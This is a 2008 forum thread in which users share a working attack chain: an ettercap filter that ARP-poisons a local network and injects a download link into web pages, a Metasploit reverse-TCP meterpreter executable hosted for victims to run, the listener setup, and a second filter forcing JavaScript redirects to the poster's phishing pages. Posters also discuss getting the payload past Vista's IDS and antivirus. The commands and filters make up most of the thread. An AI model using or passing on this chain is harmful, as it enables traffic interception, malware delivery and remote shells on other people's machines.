ettercap filter html injection meterpeter.exe

Printable View

Show 40 post(s) from this thread on one page

11-19-2008, 08:50 AM
BigMac

ettercap filter html injection meterpeter.exe

take a look at the filter, look at what is being replaced... its sort of html injection on the fly
if any one wants to see a quick video i can post one to give you a better idea

what i did was create a reverse meteperter executable then hosted it on a server and did
some arp poisoning with some html injection and you could use this to trick people into
downloading the .exe and get your self a shell

this is just a proof of concept and i take no responsibility

html.filter

Code:

if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "<title>")) { replace("</title>", "</title><form action="http://192.168.1.6/meterpeter.exe" method="link"><img src="http://192.168.1.6/alert.gif"><INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"></form><html><body><h10>just some instructions</h10></body></html>"); msg("html injected"); }}

i think this is the working filter

-create the meterpeter.exe-
(open msfconsole)
./msfpayload windows/meterpeter/reverse_tcp LHOST=192.168.1.6 LPORT=100 x > meterpeter.exe
Now place the executable into your Apache root directory

-set up your listener-
use exploit/multi/handler
set PAYLOAD windows/meterpeter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 100

-execute ettercap-
etterfilter html.filter -o html.ef
ettercap -T -q -F html.ef -M ARP // //

now wait for some one on the network to download and execute meterpeter.exe and you will have a reverse shell

Let me know what you think
11-19-2008, 12:17 PM
hawaii67

Code:

Let me know what you think

Nice, but you need a fair amount of social engineering ;)
11-19-2008, 08:52 PM
BigMac

If i had skill in html, java or php... the webpage would sell it self

Code:

<form action="http://192.168.1.6/meterpeter.exe" method="link"> <img src="http://192.168.1.6/alert.gif"> <INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"> </form><html><body><h10>just some instructions</h10></body></html>

maybe give me some suggestions
11-20-2008, 02:56 AM
hawaii67

Don't pick me wrong, the idea is really nice. Unless you can't exploit some vulnerability you almost always depend on the user to click and/or download anything. Evilgrade is an exception to this.
11-20-2008, 03:08 AM
BigMac

http://www.infobyte.com.ar/demo/evilgrade.htm
wow this looks cool... i was not sure what evilgrade was
11-22-2008, 02:56 AM
psg2500

Hey BigMac

I recently posted about this, its in the newbie area under "Vista remote shell with phish" i have since perfected it... given a little time to work with it but i have a filter (dns wasnt working too well) that will redirect all traffic.

Thanks go out to hawaii67 for posting this filter some time ago, i'll try to find that post and put it in here later.

Try this as your filter, if the Target machine already has a web page open, it will give an error "404" after they attempt to refresh(or open another page) it will redirect to your HTTPD server.

#FILTER START#

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("changed Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<BODY", "&#x000D<BODY onload=\"javascript:document.location.href='inster t your site here'\"><XSS a=");
replace("<body", "&#x000D<body onload=\"javascript:document.location.href='insert your site here'\"><XSS a=");
msg("Filter Ran.\n");
}

#FILTER END#

--EDIT--
This post doesnt allow script spacing, but im sure you'll get it. I also have the web pages built ;) and yes they do SELL THEMSELVES. If anyones interested send me a message or an email, and ill send you a copy of what i have thus far. (im not sure if i can put them on here?)
And the original script was posted in a Backtrack 2.0 post entitled "ettercap filters" page 2 of the post if anyone wants to read more about it.
11-22-2008, 07:41 PM
BigMac

<P ALIGN=center><IFRAME SRC="http://server" WIDTH=300 HEIGHT=100></IFRAME></P>

this iframe has potential

and check out irongeeks latest video's... bypass anti-vir fully undetected...
11-22-2008, 11:10 PM
psg2500

ill look into it

I watched the video, the problem with the normal way we both had going is that vista's ids picks it up (note that XP sp3 does not ...it just runs), this may solve that problem. The normal way with meterpreter/reverse_http does not set off ids, however it really doesnt work. I will play around with the code for the filter and with my setup and see if it gets past IDS. My money says it will. But ill let you know.
Also i think you will find that windows users have come to expect the OS asking them "do you want to?, do you really?, are you sure?, thats not such a good idea!, DO YOU REALLY!!!?".
lol, but again, give me a day or two to test some things and ill get back to you.
11-23-2008, 02:54 AM
BigMac

have you tested this msfencode? http://metasploit.com/dev/trac/wiki/...ingMeterpreter

its not working for me... i use the correct commands and check the ls -alrt and then i execute this payload on one of my computers but the exploit multi handler does not get a connection ? ? ? im stumped
11-23-2008, 03:33 AM
psg2500

No that one doesnt work for me.

i have tried it, i could not get it to work either, the only one that gives me a connection is the Original script, there must be something in the EXE payload thats not running, im still playing with it.
The next step for me is to start trouble shooting by running a few pre-made exe files and see if ANY connect back. If not, i will see if i cant find out why. I think it has something to do with the way the payload is initiated. Ill start trouble shooting tommorow.

Show 40 post(s) from this thread on one page